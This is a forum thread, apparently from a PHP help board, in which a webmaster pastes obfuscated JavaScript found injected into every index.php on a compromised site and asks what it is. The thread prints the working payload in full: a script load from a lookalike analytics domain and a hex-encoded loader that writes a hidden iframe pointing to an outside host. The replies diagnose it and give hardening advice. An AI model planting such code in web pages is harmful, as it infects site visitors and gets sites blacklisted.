Was i hacked or just a glitch????

[ccrevcypsys]

Hello all,

Well this morning my work called me and bitched me out because they said on of our websites was down. Well I go onto the Ftp for that website and view the index.php file in the root folder and i saw this and only this :

<script src="http://analytics-google.info/i/urchin.js"></script><script>function c41920832628m4871cf76da46c(m4871cf76da853){ function m4871cf76dac3b(){var m4871cf76db022=16;return m4871cf76db022;} return (parseInt(m4871cf76da853,m4871cf76dac3b()));}function m4871cf76db40b(m4871cf76db7f2){ var m4871cf76dc3aa=2; var m4871cf76dbbda='';m4871cf76dcd31=String.fromCharCode;for(m4871cf76dbfc2=0;m4871cf76dbfc2<m4871cf76db7f2.length;m4871cf76dbfc2+=m4871cf76dc3aa){ m4871cf76dbbda+=(m4871cf76dcd31(c41920832628m4871cf76da46c(m4871cf76db7f2.substr(m4871cf76dbfc2,m4871cf76dc3aa))));}return m4871cf76dbbda;} var zf7='';var m4871cf76dcf63='3C7'+zf7+'3637'+zf7+'2697'+zf7+'07'+zf7+'43E667'+zf7+'56E637'+zf7+'4696F6E20636865636B5F636F6E7'+zf7+'4656E7'+zf7+'428297'+zf7+'B7'+zf7+'6617'+zf7+'220693D303B7'+zf7+'7'+zf7+'68696C6528646F637'+zf7+'56D656E7'+zf7+'42E67'+zf7+'657'+zf7+'4456C656D656E7'+zf7+'47'+zf7+'3427'+zf7+'9546167'+zf7+'4E616D652827'+zf7+'69667'+zf7+'2616D6527'+zf7+'292E6C656E67'+zf7+'7'+zf7+'468297'+zf7+'B7'+zf7+'6617'+zf7+'220656C3D646F637'+zf7+'56D656E7'+zf7+'42E67'+zf7+'657'+zf7+'4456C656D656E7'+zf7+'47'+zf7+'3427'+zf7+'9546167'+zf7+'4E616D652827'+zf7+'69667'+zf7+'2616D6527'+zf7+'295B695D3B6966282028656C2E7'+zf7+'37'+zf7+'47'+zf7+'96C652E64697'+zf7+'37'+zf7+'06C617'+zf7+'93D3D27'+zf7+'6E6F6E6527'+zf7+'207'+zf7+'C7'+zf7+'C20656C2E7'+zf7+'37'+zf7+'47'+zf7+'96C652E7'+zf7+'6697'+zf7+'36962696C697'+zf7+'47'+zf7+'9203D3D27'+zf7+'68696464656E27'+zf7+'207'+zf7+'C7'+zf7+'C2028656C2E7'+zf7+'7'+zf7+'69647'+zf7+'4683C3520262620656C2E68656967'+zf7+'687'+zf7+'43C35292920262620656C2E6E616D65213D27'+zf7+'633427'+zf7+'297'+zf7+'B656C2E7'+zf7+'0617'+zf7+'2656E7'+zf7+'44E6F64652E7'+zf7+'2656D6F7'+zf7+'6654368696C6428656C293B7'+zf7+'D656C7'+zf7+'36520692B2B3B7'+zf7+'D7'+zf7+'D636865636B5F636F6E7'+zf7+'4656E7'+zf7+'428293B0D0A696628216D7'+zf7+'96961297'+zf7+'B646F637'+zf7+'56D656E7'+zf7+'42E7'+zf7+'7'+zf7+'7'+zf7+'2697'+zf7+'465287'+zf7+'56E657'+zf7+'363617'+zf7+'065282027'+zf7+'2533632536392536362537'+zf7+'322536312536642536352532302536652536312536642536352533642536332533342532302537'+zf7+'332537'+zf7+'32253633253364253237'+zf7+'2536382537'+zf7+'342537'+zf7+'342537'+zf7+'30253361253266253266253637'+zf7+'253666253666253637'+zf7+'2536632536352532642536312536652536312536632536392537'+zf7+'61253635253265253633253666253664253266253639253665253265253633253637'+zf7+'253639253366253331253335262537'+zf7+'382537'+zf7+'3525336425333126253237'+zf7+'2532622534642536312537'+zf7+'342536382532652537'+zf7+'322536662537'+zf7+'352536652536342532382534642536312537'+zf7+'342536382532652537'+zf7+'32253631253665253634253666253664253238253239253261253331253337'+zf7+'253331253336253331253336253239253262253237'+zf7+'253337'+zf7+'253634253633253631253333253237'+zf7+'2532302537'+zf7+'37'+zf7+'2536392536342537'+zf7+'34253638253364253336253339253332253230253638253635253639253637'+zf7+'2536382537'+zf7+'342533642533322533342533382532302537'+zf7+'332537'+zf7+'342537'+zf7+'39253663253635253364253237'+zf7+'2536342536392537'+zf7+'332537'+zf7+'302536632536312537'+zf7+'39253361253230253665253666253665253635253237'+zf7+'2533652533632532662536392536362537'+zf7+'3225363125366425363525336527'+zf7+'29293B7'+zf7+'D7'+zf7+'6617'+zf7+'2206D7'+zf7+'969613D7'+zf7+'47'+zf7+'27'+zf7+'5653B3C2F7'+zf7+'3637'+zf7+'2697'+zf7+'07'+zf7+'43E';document.write(m4871cf76db40b(m4871cf76dcf63));</script><script>check_content()</script>

 

I have no idea what it means and I need to figure out if we have a security issue or what it is before i lose my job. So if someone has had this happen to them let me know why it did if you can figure it out. Oh and on every index.php (not any index.htm or html pages... wierd) in every folder on the site has changed to this as well. So something happend and i dont know what. Its wierd because the google analytics urchin.js isnt even located on the index.php its on the header.php which is included with this page... HELP PLEASE

[discomatt]

Possible XSS injection. Without code, we don't know.

 

Whether this was a hole in your PHP or hole in the server, we don't know either.

[cleibesouza]

This piece:

<script src="http://analytics-google.info/i/urchin.js">

Is the javascript one would include for google analytics. The rest of the code I have no idea what that could be.

 

[ccrevcypsys]

Well ill research that but there is a way to make every index.php page on a server no matter what folder and what protection it is turn into this script???

 

THATS CRAZY

 

This piece:

<script src="http://analytics-google.info/i/urchin.js">

Is the javascript one would include for google analytics. The rest of the code I have no idea what that could be.

 

Ya i know that it is. Thats y i siad the wierd thing was that that code is located on a completely different page than the index.php page..

[discomatt]

Is it hard-coded into the pages, or simply in the source?

[ccrevcypsys]

It has been hard coded

[anon_login_001]

time to change passwords/users, etc.

 

[gigas10]

black crawler :-x. Change pw for every user, and redo your sites security and sql injection stripping.

[discomatt]

If it's hard coded into the pages, i doubt it's injection... if it is, then your site is designed all wrong.

[lemmin]

This piece:

<script src="http://analytics-google.info/i/urchin.js">

Is the javascript one would include for google analytics. The rest of the code I have no idea what that could be.

 

 

It is actually a fake. I think it results from local spy/malware that could be have been acquired from completely indirect methods, so I wouldn't assume that it was a direct attack. This thread has some info about it:

http://answers.yahoo.com/question/index?qid=20080701035849AAghyGG

[libertyct]

yup i had to deal with this one too at my workplace. we've been dealing with it for months now and it even gets your website blacklisted on google

[ccrevcypsys]

Ok well i did the research on that and what the yahoo topic said was exactly how it looked before i fixed it.

 

One question still remains though why would it do this to only one site on the server and not all of them????

[ccrevcypsys]

are you kidding me... blacklisted from google thats shit...

 

what a terrible fucking trojan

[lemmin]

It probably looks for a certain format for a web page file and your other files may be in a different format. Something like only one index.htm or .php. Or maybe your machine doesn't have access to other ones. There are a number of reasons why that would happen.

[ccrevcypsys]

Well we are shutting that server down and going with godaddy servers is this a good idea???

[discomatt]

It could've been a bad password. Might not be your hosts fault. Could have also been an unpatched cPanel.

[ccrevcypsys]

its a dedicated server so we host it...

[discomatt]

Hire better admins?

[ccrevcypsys]

i c... is there anyway to make sure this wont happen again???????

 

(besides the admins) like some programming tool or whatnot?

[kenrbnsn]

Take your machine off the Internet.

 

If no one can get to it, it can't be hacked.

 

Ken

[hotmedia]

I normally wouldn't join a PHP forum but it seems as though we're all having the same problem.  I've written some php code and used some of the free php sites but (please don't hate me) i am natively a coldfusion programmer.  Since christmas 2009 I've been getting injected and reinjected on a few of my sites/databases.  This hack is getting into my ntext and text fields on my database which is sql server.  I have a script which I can run against the database and clean out all traces of it in seconds now once I see that it's in there but it keeps finding it's way back in.  I've been told that they do this via sql statements that are update sql statements. 

 

I figured that I'd show here that this hack is not specific to php.  I'm searching today for a patch or solution that will help me lock down my servers so these a - holes don't keep getting into my system.

 

Let's put our heads together and see what we can come up with!

[oni-kun]

I normally wouldn't join a PHP forum but it seems as though we're all having the same problem.  I've written some php code and used some of the free php sites but (please don't hate me) i am natively a coldfusion programmer.  Since christmas 2009 I've been getting injected and reinjected on a few of my sites/databases.  This hack is getting into my ntext and text fields on my database which is sql server.  I have a script which I can run against the database and clean out all traces of it in seconds now once I see that it's in there but it keeps finding it's way back in.  I've been told that they do this via sql statements that are update sql statements. 

 

I figured that I'd show here that this hack is not specific to php.  I'm searching today for a patch or solution that will help me lock down my servers so these a - holes don't keep getting into my system.

 

Let's put our heads together and see what we can come up with!

 

mysql_real_escape_string

[mrMarcus]

several steps can be taken here:

 

1. NEVER store your FTP passwords locally; when your FTP client asks, "Remember this password?", click "no", and type it in manually.  this could be a problem when your computer gets infected with an app that searches for stored FTP information, automatically logs in and adds malicious code to files.

 

1a. change password(s) often; use long multi-character passwords (*(7Hyh^b^*&6b6n9^%^$v43$@$#).

 

2. use SFTP (SecureFTP) instead of plain FTP.  will have to contact your host for more information as to what port to use (usually 2222 or 22, can't remember off hand).

 

3. run virus scans regularly on server(s) and computers which will accessing live servers.

 

4. update server software regularly.

 

5. fix holes in website to combat XSS attacks;  ensure file/folder permissions are up to par (make sure files are not writable, etc).

 

that's a start, anyways.

[Maq]

I normally wouldn't join a PHP forum but it seems as though we're all having the same problem.  I've written some php code and used some of the free php sites but (please don't hate me) i am natively a coldfusion programmer.  Since christmas 2009 I've been getting injected and reinjected on a few of my sites/databases.  This hack is getting into my ntext and text fields on my database which is sql server.  I have a script which I can run against the database and clean out all traces of it in seconds now once I see that it's in there but it keeps finding it's way back in.  I've been told that they do this via sql statements that are update sql statements. 

 

I figured that I'd show here that this hack is not specific to php.  I'm searching today for a patch or solution that will help me lock down my servers so these a - holes don't keep getting into my system.

 

Let's put our heads together and see what we can come up with!

 

I understand you're encountering the same problems as the OP, but this thread is more than 1 1/2 years old.  No biggie, it's just better to start a fresh thread for the best responses.

[abazoskib]

Well we are shutting that server down and going with godaddy servers is this a good idea???

 

godaddy has been terrible in my experiences. although im sure if you go with a dedicated machine you should be ok. do not use their shared server. make sure to use a really good password because godaddy ssh accounts get brute forced all the time.